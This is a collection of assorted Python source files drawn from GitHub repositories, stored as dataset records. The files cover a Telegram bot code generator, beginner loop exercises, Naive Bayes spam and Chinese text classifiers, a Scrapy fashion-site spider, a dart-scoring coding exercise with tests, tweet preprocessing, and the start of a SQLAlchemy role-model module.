\"\"\" self.path + \".\" + self.name \"\"\"\n if self.path:\n if self.name:\n return self.path + \".\" + self.name\n else:\n return self.path\n # end if\n else:\n if self.name:\n return self.name\n else:\n return \"\"\n # end if\n # end if\n # end def full\n\n def import_statement_from_file(self, base_path: Union[str, None] = None):\n \"\"\"\n :param base_path: If None does absolute import.\n :return:\n \"\"\"\n if base_path is None:\n path = self.full\n else:\n path = self.relative_import_full(base_path=base_path)\n # end if\n from code_generator_template import path_to_import_text\n return path_to_import_text(path)\n # end def\n\n def calculate_filepath(self, folder: str) -> str:\n from code_generator_online import calc_path_and_create_folders\n full_path = ''\n if self.path:\n full_path += self.path\n # end if\n if self.is_init:\n full_path += '.__init__'\n # end if\n if self.name:\n full_path += '.' + self.name\n # end if\n full_path = full_path.strip('.')\n\n return calc_path_and_create_folders(folder, full_path)\n # end def\n\n def __str__(self):\n return self.full\n # end def\n\n def __hash__(self):\n path = self.path if self.path else \"%$none\"\n name = self.name if self.name else \"%$none\"\n return hash(path + name)\n # end def __hash__\n\n \"\"\"\n If it is bigger (+1), equal (0) or less (-1)\n :return: +1, 0 or -1\n :rtype: int\n \"\"\"\n def compare(self, other):\n self_path = \"\" if self.path is None else self.path\n other_path = \"\" if other.path is None else other.path\n if self_path < other_path:\n return -1\n elif self_path > other_path:\n return +1\n elif self.name < other.name:\n return -1\n elif self.name > other.name:\n return +1\n else:\n return 0\n # end if\n # end def compare\n\n \"\"\" self >= other \"\"\"\n def __ge__(self, other):\n return self.compare(other) >= 0\n # end def __ge__\n\n \"\"\" self > other \"\"\"\n def __gt__(self, other):\n return self.compare(other) > 0\n # end def __gt__\n\n \"\"\" self == other \"\"\"\n def __eq__(self, other):\n return self.compare(other) == 0\n # end def __eq__\n\n \"\"\" self <= other \"\"\"\n def __le__(self, other):\n return self.compare(other) <= 0\n # end def __le__\n\n \"\"\" self < other \"\"\"\n def __lt__(self, other):\n return self.compare(other) < 0\n # end def __lt__\n\n \"\"\" self != other \"\"\"\n def __ne__(self, other):\n return self.compare(other) != 0\n # end def __ne__\n\n def __repr__(self):\n return (\n \"Import(\"\n \"path={s.path!r}, name={s.name!r}, is_init={s.is_init!r}\"\n \")\"\n ).format(s=self)\n # end def __repr__\n# end class Import\n\n\nclass FunctionClazz(Clazz):\n def __init__(\n self,\n clazz: Union[None, str] = None,\n import_path: Union[None, 'Import'] = None,\n imports: Union[None, List['Import']] = None,\n parent_clazz: Union[None, 'Type'] = None,\n link: Union[None, str] = None,\n description: Union[None, str] = None,\n parameters: Union[None, List['Variable']] = None,\n keywords: Union[None, List['Variable']] = None,\n function: Union[None, Function] = None,\n ):\n \"\"\"\n Like a class, but contains the original function this was build from.\n :param function: Function\n \"\"\"\n super().__init__(clazz, import_path, imports, parent_clazz, link, description, parameters, keywords)\n assert_type_or_raise(function, Function, None, parameter_name='function')\n self.function = function if function else Function()\n # end def\n# end class\n\nclass CustomClazz(Clazz):\n def __init__(\n self,\n clazz: Union[None, str] = None,\n import_path: Union[None, 'Import'] = None,\n imports: Union[None, List['Import']] = None,\n parent_clazz: Union[None, 'Type'] = None,\n link: Union[None, str] = None,\n description: Union[None, str] = None,\n parameters: Union[None, List['Variable']] = None,\n keywords: Union[None, List['Variable']] = None,\n body: Union[None, 'ReplacementBody'] = None,\n ):\n \"\"\"\n Like a class, but contains a body.\n :param body: ReplacementBody\n \"\"\"\n super().__init__(clazz, import_path, imports, parent_clazz, link, description, parameters, keywords)\n assert_type_or_raise(body, ReplacementBody, None, parameter_name='body')\n self.body = body if body else ReplacementBody()\n # end def\n# end class\n\n\nclass ReplacementBody(object):\n # noinspection PyShadowingBuiltins\n def __init__(\n self,\n before: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n init: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n to_array: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n validate_array: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n from_array: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n str: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n repr: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n contains: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n after: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n ):\n self.before = before\n self.init = init\n self.to_array = to_array\n self.validate_array = validate_array\n self.from_array = from_array\n self.str = str\n self.repr = repr\n self.contains = contains\n self.after = after\n # end def\n# end class\n","repo_name":"luckydonald/pytgbot","sub_path":"code_generation/code_generator_classes.py","file_name":"code_generator_classes.py","file_ext":"py","file_size_in_byte":36135,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"7"} +{"seq_id":"22008954999","text":"#while loops run until a certain condition is met\nplayers = 11\n\nwhile players >= 5:\n print(\"The remaining players are\", players)\n players -= 1\n\n#break statement\n#allows code to jump out of a loop whenever a certain condition is met\nnumber = 0\nwhile True:\n print(\"I love candy \" + str(number))\n number +=1\n if number == 7:\n break\n\n#continue statement\n# allows us to jump back to the top of our loop\n# continue keyword ignores all other statements under it and are not run\n'''\nin a team of 20, some numbers are taken and want to display the numbers\nthat are not taken so others don't pick the picked numbers'''\n#taken numbers\nnumTaken = [3,5,7,11,13]\n\nprint(\"Available numbers\")\n\n#loop\nfor i in range (1,21):\n if i in numTaken:\n continue\n print(i)\n ","repo_name":"Njihia413/python-intro","sub_path":"while-loop.py","file_name":"while-loop.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7501986749","text":"import codecs\nfrom collections import Counter\nimport os\nimport glob\nfrom textblob import TextBlob as tb\nimport math\n\ndef tf(word, blob):\n\treturn (float)(blob.words.count(word)) / (float)(len(blob.words))\n\ndef n_containing(word, bloblist):\n\treturn sum(1 for blob in bloblist if word in blob.words)\n\ndef idf(word, bloblist):\n\treturn (float) (math.log(len(bloblist))) / (float)(1 + n_containing(word, bloblist))\n\ndef tfidf(word, blob, bloblist):\n\treturn tf(word, blob) * idf(word, bloblist)\n\n\n\nwords_list = []\nstop = []\nwords_dict = {}\nsplsym = [\"-\",\",\",\"!\",\"#\",\"%\",\"^\",\"&\",\"*\",\"(\",\")\",\"!\", \":\",\".\",\"{\",\"}\", \"[\",\"]\",\">\",\"<\",\"?\",\"/\", \"*\",\"~\", \"@\"]\nspam_dict = {}\nham_dict = {}\nham_total_word_count = 0\nspam_total_word_count = 0\nham_distinct_words = 0\nspam_distinct_words = 0\ndistinct_vocab = {}\n\ndef get_file_list(path_to_spam, path_to_ham):\n\t\n\tspam_bloblist = []\n\tfor file in glob.glob(path_to_spam):\n\t\twords_list[:] = []\n\t\tfile_words = codecs.open(file, \"r\", encoding='utf-8', errors='ignore' )\n\t\tfor line in file_words:\n\t\t\tfor word in line.split():\n\t\t\t\tif not word in stop_string and not word in splsym and not word.isdigit():\n\t\t\t\t\twords_list.append(word.lower())\n\t\tblob = tb(' '.join(words_list))\n\t\tspam_bloblist.append(blob)\n\t\t\n\tham_bloblist = []\n\tfor file in glob.glob(path_to_ham):\n\t\twords_list[:] = []\n\t\tfile_words = codecs.open(file, \"r\", encoding='utf-8', errors='ignore' )\n\t\tfor line in file_words:\n\t\t\tfor word in line.split():\n\t\t\t\tif not word in stop_string and not word in splsym and not word.isdigit():\n\t\t\t\t\twords_list.append(word.lower())\n\t\tblob = tb(' '.join(words_list))\n\t\tham_bloblist.append(blob)\n\n\treturn spam_bloblist, ham_bloblist\n\n\n\n\ndef find_likelihood(spam_dict, ham_dict):\n\tspam_total_word_count = 0\n\n\tfor word in spam_dict:\n\t\tspam_total_word_count += spam_dict[word]\n\n\n\tham_total_word_count = 0\n\n\tfor word in ham_dict:\n\t\tham_total_word_count += ham_dict[word]\n\n\tspam_distinct_words_count = len(spam_dict)\n\tham_distinct_words_count = len(ham_dict)\n\n\tdistinct_vocab = dict(spam_dict.items() + ham_dict.items())\n\n\tspam_likelihood = {}\n\n\tfor word in distinct_vocab:\n\t\tif word in spam_dict:\n\t\t\tspam_lhood = (spam_dict[word] + 1.0) / (spam_total_word_count + len(distinct_vocab) + 1.0)\n\t\t\tspam_log_likelihood = round(math.log(spam_lhood), 3)\n\t\t\tspam_likelihood[word] = spam_log_likelihood\n\n\tham_likelihood = {}\n\n\tfor word in distinct_vocab:\n\t\tif word in ham_dict:\n\t\t\tham_lhood = (ham_dict[word] + 1.0) / (ham_total_word_count + len(distinct_vocab) + 1.0)\n\t\t\tham_log_likelihood = round(math.log(ham_lhood), 3)\n\t\t\tham_likelihood[word] = ham_log_likelihood\n\n\treturn spam_likelihood, ham_likelihood\n\n\ndef get_dict(spam_bloblist, ham_bloblist):\n\n\tfor i, blob in enumerate(spam_bloblist):\n\t\tfor word in blob.words:\n\t\t\tif word in spam_dict:\n\t\t\t\tspam_dict[word] += 1\n\t\t\telse:\n\t\t\t\tspam_dict[word] = 1\n\n\t\n\tfor i, blob in enumerate(ham_bloblist):\n\t\tfor word in blob.words:\n\t\t\tif word in ham_dict:\n\t\t\t\tham_dict[word] += 1\n\t\t\telse:\n\t\t\t\tham_dict[word] = 1\n\n\treturn spam_dict, ham_dict\n\n\n\n#Calculate posterior probability\n\ndef accuracy_check(blob):\n\n\tcurrent_spam_probability = 0.0\n\tcurrent_ham_probability = 0.0\n\n\tfor word in blob.words:\n\t\tif word in h_likelihood:\n\t\t\tcurrent_ham_probability += h_likelihood[word]\n\t\telse:\n\t\t\tcurrent_ham_probability = current_ham_probability + math.log(1.0 / (ham_total_word_count + len(distinct_vocab) + 1.0))\n\n\t\tif word in s_likelihood:\n\t\t\tcurrent_spam_probability += s_likelihood[word]\n\t\telse:\n\t\t\tcurrent_spam_probability = current_spam_probability + math.log(1.0 / (spam_total_word_count + len(distinct_vocab) + 1.0))\n\n\tcurrent_spam_probability = current_spam_probability + prior_spam_probability\n\tcurrent_ham_probability = current_ham_probability + prior_ham_probability\n\n\t# print(current_ham_probability)\n\t# print(current_spam_probability)\n\n\n\tif(current_ham_probability > current_spam_probability):\n\t\treturn 1 \n\telse:\n\t\treturn 0\n\n\nif __name__ == \"__main__\":\n\tpath = raw_input(\"Please provide path to directory containing datasets: \")\n\n\tpath_to_spam = path + \"/train/spam/*.txt\"\n\tpath_to_ham = path + \"/train/ham/*.txt\"\n\n\tpath_to_spam_test = path + \"/test/spam/*.txt\"\n\tpath_to_ham_test = path + \"/test/ham/*.txt\"\n\n\tstop_words = open(\"Stop_words.txt\").read()\n\tfor line in stop_words:\n\t\tfor word in line.split(' '):\n\t\t\tstop.append(word)\n\n\tstop_string = ''.join(stop)\n\n\tspam_bloblist, ham_bloblist = get_file_list(path_to_spam, path_to_ham)\n\n\t#print(spam_bloblist)\n\n\tspam_dict, ham_dict = get_dict(spam_bloblist, ham_bloblist)\n\n\ts_likelihood, h_likelihood = find_likelihood(spam_dict, ham_dict)\n\n\tprior_spam_probability = (float)(len(spam_bloblist) * 1.0) / (float)(len(spam_bloblist) + len(ham_bloblist))\n\n\tlog_prior_spam_probability = math.log(prior_spam_probability)\n\n\tprint(prior_spam_probability)\n\n\tprior_ham_probability = 1.0 - prior_spam_probability\n\n\tlog_prior_ham_probability = math.log(prior_ham_probability)\n\n\tprint(prior_ham_probability)\n\n\tham_correct = 0.0\n\tnh = 0\n\tfor i,blob in enumerate(ham_bloblist):\n\t\tnh = nh+1\n\t\tif accuracy_check(ham_bloblist[i]) == 1:\n\t\t\tham_correct += 1.0\n\n\n\tspam_correct = 0.0\n\tns = 0\n\tfor i,blob in enumerate(spam_bloblist):\n\t\tns = ns+1\n\t\tif accuracy_check(spam_bloblist[i]) == 0:\n\t\t\tspam_correct += 1.0\n\n\t#print(len(ham_bloblist))\n\tham_accuracy = (ham_correct/nh) * 100\n\n\tspam_accuracy = (spam_correct/ns) * 100\n\n\tprint(\"Ham accuracy is: \" + str(ham_accuracy))\n\n\tprint(\"Spam accuracy is: \" + str(spam_accuracy))\n\n\tspam_bloblist[:] = []\n\n\tham_bloblist[:] = []\n\n\tham_accuracy = 0.0\n\n\tspam_accuracy = 0.0\n\n\tspam_bloblist, ham_bloblist = get_file_list(path_to_spam_test, path_to_ham_test)\n\n\n\tham_correct = 0.0\n\tnh = 0\n\tfor i,blob in enumerate(ham_bloblist):\n\t\tnh = nh+1\n\t\tif accuracy_check(ham_bloblist[i]) == 1:\n\t\t\tham_correct += 1.0\n\n\n\tspam_correct = 0.0\n\tns = 0\n\tfor i,blob in enumerate(spam_bloblist):\n\t\tns = ns+1\n\t\tif accuracy_check(spam_bloblist[i]) == 0:\n\t\t\tspam_correct += 1.0\n\n\t#print(len(ham_bloblist))\n\tham_accuracy = (ham_correct/nh) * 100\n\n\tspam_accuracy = (spam_correct/ns) * 100\n\n\tprint(\"Ham accuracy is: \" + str(ham_accuracy))\n\n\tprint(\"Spam accuracy is: \" + str(spam_accuracy))\n\n\n","repo_name":"alchemist009/ML_musings","sub_path":"NaiveBayes/NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1378667269","text":"#coding=gbk\r\nimport os #用于读取文件\r\nimport jieba #用于给中文分词\r\nimport pandas\r\nimport numpy\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n#preprocess用于将一个文本文档进行切词,并以字符串形式输出切词结果\r\ndef preprocess(path_name):\r\n text_with_spaces = \"\"\r\n textfile = open(path_name, \"r\", encoding=\"gb18030\").read()\r\n textcut = jieba.cut(textfile)\r\n for word in textcut:\r\n text_with_spaces += word+\" \"\r\n return text_with_spaces\r\n\r\n\r\n#loadtrainset用于将某一文件夹下的所有文本文档批量切词后,载入为训练数据集;返回训练集和每一个文本(元组)对应的类标号。\r\ndef loadtrainset(path, classtag):\r\n allfiles=os.listdir(path)\r\n processed_textset = []\r\n allclasstags = []\r\n for thisfile in allfiles:\r\n path_name = path+\"/\"+thisfile\r\n processed_textset.append(preprocess(path_name))\r\n allclasstags.append(classtag)\r\n #print(processed_textset)\r\n #print(allclasstags)\r\n return processed_textset, allclasstags\r\n\r\n\r\n#载入数据,并进行交叉验证\r\nfemale_dataset, female_class = loadtrainset(\"D:/data/女性\", \"女性\")\r\nX1_train, X1_test, y1_train, y1_test = train_test_split(female_dataset, female_class, test_size=0.2)\r\ngym_dataset, gym_class = loadtrainset(\"D:/data/体育\", \"体育\")\r\nX2_train, X2_test, y2_train, y2_test = train_test_split(gym_dataset, gym_class, test_size=0.2)\r\nliterature_dataset, literature_class=loadtrainset(\"D:/data/文学出版\", \"文学\")\r\nX3_train, X3_test, y3_train, y3_test = train_test_split(literature_dataset, literature_class, test_size=0.2)\r\ncampus_dataset, campus_class=loadtrainset(\"D:/data/校园\", \"校园\")\r\nX4_train, X4_test, y4_train, y4_test = train_test_split(campus_dataset, campus_class, test_size=0.2)\r\n\r\n\r\nintegrated_train_data = X1_train+X2_train+X3_train+X4_train\r\nclasstags_list = y1_train+y2_train+y3_train+y4_train\r\n\r\ncount_vector = CountVectorizer()\r\n#该类会将文本中的词语转换为词频矩阵,矩阵元素a[i][j] 表示j词在i类文本下的词频\r\nvector_matrix = count_vector.fit_transform(integrated_train_data)\r\n\r\n#tfidf度量模型\r\ntrain_tfidf = TfidfTransformer(use_idf=False).fit_transform(vector_matrix)\r\n#将词频矩阵转化为权重矩阵,每一个特征值就是一个单词的TF-IDF值\r\n\r\n#调用MultinomialNB分类器进行训练\r\nmnb = MultinomialNB()\r\nclf = mnb.fit(train_tfidf,classtags_list)\r\n\r\n\r\n#测试\r\ntestset = X1_test+X2_test+X3_test+X4_test\r\ntestclass = y1_test+y2_test+y3_test+y4_test\r\n#testset.append(preprocess(\"F:/Datasets/testdata/testdata.txt\"))\r\n#testset.append(\"学生 硕士 毕业生 高校 课程 大学\")\r\nnew_count_vector = count_vector.transform(testset)\r\nnew_tfidf= TfidfTransformer(use_idf=False).fit_transform(new_count_vector)\r\npredict_result = clf.predict(new_tfidf) #预测结果\r\n\r\nprint(predict_result)\r\nprint('预测准确率', mnb.score(new_tfidf, testclass))\r\n\r\n","repo_name":"zhangwenyuan919/ML_DL_assignment","sub_path":"ML_assignment/doc_categorize.py","file_name":"doc_categorize.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15139537119","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport logging\nfrom pymongo import MongoClient\nimport json\nimport codecs\nfrom ..items import XinshuiItem\n\nclass WornontvSpider(scrapy.Spider):\n name = \"wornontv\"\n allowed_domains = [\"wornontv.net\"]\n\n def __init__(self):\n self.start_urls = []\n for t in range(18000, 30000):\n self.start_urls.append(\"http://wornontv.net/%s/\" % t)\n # f_out = open(\"wornontv.txt\", \"w\")\n\n # def parse(self, response):\n # links = response.xpath(\"//div[@class='pure-g showlist']/div/ul/li/a\")\n # for link in links:\n # url = link.xpath(\"@href\").extract()[0]\n # title = link.xpath(\"text()\").extract()[0]\n # # print url, title\n # f_out.write(title + \"|\" + url + \"\\n\")\n def parse(self, response):\n item = XinshuiItem()\n body = response.xpath(\"//div[@class='single-inner box']\")\n img = body.xpath(\"//div['content-image']/p/img\")\n breadcrumbs = body.xpath(\"//ul[@class='breadcrumbs']/li/a/span/text()\").extract()\n item[\"_id\"] = response.url.split(\"/\")[-2]\n item['src'] = \"tv\"\n item['des'] = body.xpath(\"//div[@class='outfit-details-box']/h1/text()\").extract()[0]\n item['show'] = breadcrumbs[1]\n item['episode'] = breadcrumbs[2]\n content_a = body.xpath(\"//span[@class='metabox-content pure-u-4-5']/a/text()\").extract()\n content_t = body.xpath(\"//span[@class='metabox-content pure-u-4-5']/text()\").extract()\n item['episode_name'] = content_a[0].strip()\n item['character'] = content_a[1].strip()\n item['actor'] = content_t[2].split(\"played by\")[1].strip()\n item['post_time'] = content_t[3].strip()\n item['img'] = img.xpath(\"@src\").extract()[0]\n if len(body.xpath(\"//div[@class='outfit-details-box']/p/text()\").extract()) > 0:\n item[\"found\"] = False\n yield item\n else:\n item[\"found\"] = True\n item['brand'] = body.xpath(\"//span[@class='pure-u-4-5 outfit-details-content']/text()\").extract()[0].split(\"by\")[0].strip()\n item['product_type'] = body.xpath(\"//span[@class='pure-u-1-5 outfit-details-title']/strong/text()\").extract()[0].split(\":\")[0].strip()\n products = body.xpath(\"//div[@class='product-item ']\")\n match = []\n similar = []\n for p in products:\n product = {\n \"img\": p.xpath(\"span/img/@src\").extract()[0],\n \"url\": p.xpath(\"a/@href\").extract()[0],\n \"title\": p.xpath(\"a/@title\").extract()[0],\n \"price\": p.xpath(\"a/span[@class='product-price']/text()\").extract()[0],\n \"store\": p.xpath(\"a/span[@class='product-store']/text()\").extract()[0]\n }\n cat = p.xpath(\"a/img/@class\").extract()[0]\n if cat == \"exact-match\":\n match.append(product)\n else:\n similar.append(product)\n item[\"match\"] = match\n item[\"similar\"] = similar\n yield item\n\n","repo_name":"neozhangthe1/scraper","sub_path":"framedrop/wornontv/xinshui/spiders/wornontv.py","file_name":"wornontv.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35413437508","text":"import unittest\nimport re\n\nfrom utils import CommonUtils\n\n\nclass Solution:\n \"\"\" [1차] 다트 게임\n 카카오톡 게임별의 하반기 신규 서비스로 다트 게임을 출시하기로 했다.\n 다트 게임은 다트판에 다트를 세 차례 던져 그 점수의 합계로 실력을 겨루는 게임으로, 모두가 간단히 즐길 수 있다.\n 갓 입사한 무지는 코딩 실력을 인정받아 게임의 핵심 부분인 점수 계산 로직을 맡게 되었다.\n 다트 게임의 점수 계산 로직은 아래와 같다.\n 다트 게임은 총 3번의 기회로 구성된다.\n \n 1. 각 기회마다 얻을 수 있는 점수는 0점에서 10점까지이다.\n 2. 점수와 함께 Single(S), Double(D), Triple(T) 영역이 존재하고\n 각 영역 당첨 시 점수에서 1제곱, 2제곱, 3제곱 (점수1 , 점수2 , 점수3 )으로 계산된다.\n 3. 옵션으로 스타상(*) , 아차상(#)이 존재하며 스타상(*) 당첨 시 해당 점수와 바로 전에 얻은 점수를 각 2배로 만든다.\n 아차상(#) 당첨 시 해당 점수는 마이너스된다.\n 4. 스타상(*)은 첫 번째 기회에서도 나올 수 있다. 이 경우 첫 번째 스타상(*)의 점수만 2배가 된다. (예제 4번 참고)\n 5. 스타상(*)의 효과는 다른 스타상(*)의 효과와 중첩될 수 있다. 이 경우 중첩된 스타상(*) 점수는 4배가 된다. (예제 4번 참고)\n 6. 스타상(*)의 효과는 아차상(#)의 효과와 중첩될 수 있다. 이 경우 중첩된 아차상(#)의 점수는 -2배가 된다. (예제 5번 참고)\n 7. Single(S), Double(D), Triple(T)은 점수마다 하나씩 존재한다.\n 8. 스타상(*), 아차상(#)은 점수마다 둘 중 하나만 존재할 수 있으며, 존재하지 않을 수도 있다.\n \n 0~10의 정수와 문자 S, D, T, *, #로 구성된 문자열이 입력될 시 총점수를 반환하는 함수를 작성하라.\n \n 입력 형식\n 점수|보너스|[옵션]으로 이루어진 문자열 3세트.\n 예) 1S2D*3T\n \n 점수는 0에서 10 사이의 정수이다.\n 보너스는 S, D, T 중 하나이다.\n 옵선은 *이나 # 중 하나이며, 없을 수도 있다.\n\n 출력 형식\n 3번의 기회에서 얻은 점수 합계에 해당하는 정수값을 출력한다.\n 예) 37\n \n 입출력 예제\n 예제\tdartResult answer 설명\n 1 1S2D*3T\t 37 1**1 * 2 + 22 * 2 + 33\n 2 1D2S#10S 9 1**2 + 2**1 * (-1) + 101\n 3 1D2S0T 3 1**2 + 2**1 + 03\n 4 1S*2T*3S 23 1**1 * 2 * 2 + 23 * 2 + 31\n 5 1D#2S*3S 5 1**2 * (-1) * 2 + 21 * 2 + 31\n 6 1T2D3D#\t -4 1**3 + 22 + 32 * (-1)\n 7 1D2S3T*\t 59 1**2 + 21 * 2 + 33 * 2\n \"\"\"\n \n def my_solution(self, dartResult: str) -> int:\n num = ''\n check_count = -1\n scores = [0] * 3\n \n for char in dartResult:\n \n if char.isdigit():\n num += char\n continue\n \n if num:\n check_count += 1\n scores[check_count] = int(num)\n num = ''\n \n if char == 'S':\n scores[check_count] = scores[check_count] ** 1\n continue\n \n if char == 'D':\n scores[check_count] = scores[check_count] ** 2\n continue\n \n if char == 'T':\n scores[check_count] = scores[check_count] ** 3\n continue\n \n if char == '*':\n scores[check_count] = scores[check_count] * 2\n \n if check_count > 0:\n scores[check_count - 1] = scores[check_count - 1] * 2\n \n continue\n \n if char == '#':\n scores[check_count] = scores[check_count] * -1\n \n return sum(scores)\n \n def best_solution_i_think(self, dartResult: str) -> int:\n bonus = {'S': 1, 'D': 2, 'T': 3}\n option = {'' : 1, '*': 2, '#': -1}\n p = re.compile('(\\d+)([SDT])([*#]?)')\n dart = p.findall(dartResult)\n \n for i in range(len(dart)):\n if dart[i][2] == '*' and i > 0:\n dart[i - 1] *= 2\n \n dart[i] = int(dart[i][0]) ** bonus[dart[i][1]] * option[dart[i][2]]\n \n return sum(dart)\n \n def other_solution(self, dartResult: str) -> int:\n point = []\n answer = []\n \n dartResult = dartResult.replace('10', 'k')\n point = ['10' if i == 'k' else i for i in dartResult]\n \n i = -1\n sdt = ['S', 'D', 'T']\n \n for j in point:\n \n if j in sdt:\n answer[i] = answer[i] ** (sdt.index(j) + 1)\n \n elif j == '*':\n answer[i] = answer[i] * 2\n \n if i != 0:\n answer[i - 1] = answer[i - 1] * 2\n \n elif j == '#':\n answer[i] = answer[i] * (-1)\n \n else:\n answer.append(int(j))\n i += 1\n \n return sum(answer)\n\n\nclass TestSolution(unittest.TestCase):\n \n def setUp(self) -> None:\n self.solution = Solution()\n \n self.case = [\n '1S2D*3T',\n '1D2S#10S',\n '1D2S0T',\n '1S*2T*3S',\n '1D#2S*3S',\n '1T2D3D#',\n '1D2S3T*'\n ]\n \n self.result = [\n 37,\n 9,\n 3,\n 23,\n 5,\n -4,\n 59\n ]\n \n @CommonUtils.logging_time\n def test_my_solution(self):\n for index in range(len(self.case)):\n result = self.solution.my_solution(self.case[index])\n \n self.assertEqual(\n self.result[index],\n result\n )\n\n @CommonUtils.logging_time\n def test_best_solution_i_think(self):\n for index in range(len(self.case)):\n result = self.solution.my_solution(self.case[index])\n \n self.assertEqual(\n self.result[index],\n result\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pm1100tm/algorithm-practice-python","sub_path":"programmers/lv_one_047.py","file_name":"lv_one_047.py","file_ext":"py","file_size_in_byte":6457,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18304913766","text":"import pandas as pd\nimport re\nimport spacy\nimport nltk\n\n# import csv\ndata = pd.read_csv('data-filtered.csv')\n\n# agroup strings\nstring = \" \".join(data['text'])\n\n############### Cleaning data process ##################\n################## FOR ENGLISH #######################\n########################################################\nspc_en = spacy.load(\"en_core_web_sm\")\n\n#example\n#text = \"He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had become much less valuable, and he had indeed the vaguest idea where the wood and river in question were.\"\n\ndef clean_text_en(text):\n # Remove characters that aren't letters and run the \"tokenization\" process\n letters = re.findall(r'\\b[A-zÀ-úü]+\\b', text.lower())\n \n # Defining stopwords\n stopwords = nltk.corpus.stopwords.words('english')\n #stopwords = set(stopwords.words('english'))\n meaningful_words = [w for w in letters if w not in stopwords]\n meaningful_words_string = \" \".join(meaningful_words)\n \n # Creating the object spacy\n spc_letters = spc_en(meaningful_words_string)\n \n # Lemmatization \n tokens = [token.lemma_ if token.pos_ == 'VERB' else str(token) for token in spc_letters]\n \n return tokens\n\nstrg = []\n# Generate tokens\nfor i in data['text']:\n words = clean_text_en(i)\n strg += [\", \".join(words)]\n \ndata['words'] = strg\ndata.to_csv('data-tweets-nlp.csv')\n","repo_name":"GabrielaNara/translating-soundscape-descriptors","sub_path":"3 - Filter_ token.py","file_name":"3 - Filter_ token.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9981604535","text":"import random\n\n# modified to calculate for input streak length\n\ndef flipCoin():\n numberOfStreaks = 0\n for experimentNumber in range(10000):\n if experimentNumber == 626:\n print(\"Ohana means family.\")\n \n # create a list of 100 'heads' or 'tails' values\n flips = []\n for i in range(100):\n flips.append(random.randint(0, 1))\n \n # check if there is a streak\n s = 0\n for i in range(1, 100):\n if flips[i] == flips[i - 1]:\n s += 1\n else:\n if s == 6:\n numberOfStreaks += 1\n s = 0\n return numberOfStreaks\n\ndef main():\n streaksNum = flipCoin()\n print(\"Number of streaks with six flips: \" + str(streaksNum))\n print(\"Percentage of all flips included in those streaks: \", end=\"\")\n print(str((streaksNum * 6) / 10000) + \"%\")\n\nif __name__ == \"__main__\":\n main()\n\n# deviated from challenge's provided output template \n# print('Chance of streak: %s%%' % (numberOfStreaks / 100))\n","repo_name":"embowman/automate-the-boring-stuff-with-python","sub_path":"coin-flip-streaks.py","file_name":"coin-flip-streaks.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1719084081","text":"import sensor\nimport lcd\n\nlcd.init()\n# camera setup\nsensor.reset()\nsensor.set_pixformat(sensor.RGB565)\nsensor.set_framesize(sensor.QVGA)\nsensor.run(1)\n\n# LCD direction controll\nlcd.direction(lcd.YX_LRUD)\n\nwhile 1:\n img = sensor.snapshot()\n lcd.display(img)\n","repo_name":"0xb5951/ArduinoDev","sub_path":"m5stickv/camera_test.py","file_name":"camera_test.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20138824014","text":"from typing import Any, List\n\nfrom sqlalchemy.types import Integer, String\nfrom sqlalchemy.schema import Column, ForeignKey\nfrom sqlalchemy.ext.declarative import declared_attr\nfrom sqlalchemy.orm import relationship, validates, class_mapper\nfrom sqlalchemy.orm.util import object_mapper\nfrom sqlalchemy.orm.exc import UnmappedInstanceError, UnmappedClassError\nfrom sqlalchemy import inspect, UniqueConstraint\nfrom sqlalchemy.exc import IntegrityError\nfrom .session import _OsoSession\n\n# Global list to keep track of role classes as they are created, used to\n# generate RBAC base policy in Polar\nROLE_CLASSES: List[Any] = []\n\n\ndef resource_role_class(\n declarative_base, user_model, resource_model, role_choices, mutually_exclusive=True\n):\n \"\"\"Create a :ref:`resource-specific role` Mixin\n for SQLAlchemy models. The role mixin is an\n `Association Object `_\n between the ``user_model`` and the ``resource_model``.\n\n :param declarative_base: The SQLAlchemy declarative base model that \\\n the role model and all related models are mapped to.\n\n :param user_model: The SQLAlchemy model representing users that the \\\n resource-specific roles can be assigned to. The generated Role mixin will \\\n have a many-to-one (Foreign Key) relationship with this user model. \\\n A many-to-many relationship to ``resource_model`` is added to ``user_model``; \\\n the relationship is named following the convention: ``resource_model.__name__.lower() + \"s\"``.\n\n :param resource_model: The SQLAlchemy model representing resources that \\\n the generated Role mixin will be scoped to. The Role mixin will \\\n have a many-to-one (ForeignKey) relationship with this resource model. \\\n A many-to-many relationship to ``user_model`` is added to ``resource_model``; \\\n the relationship is named 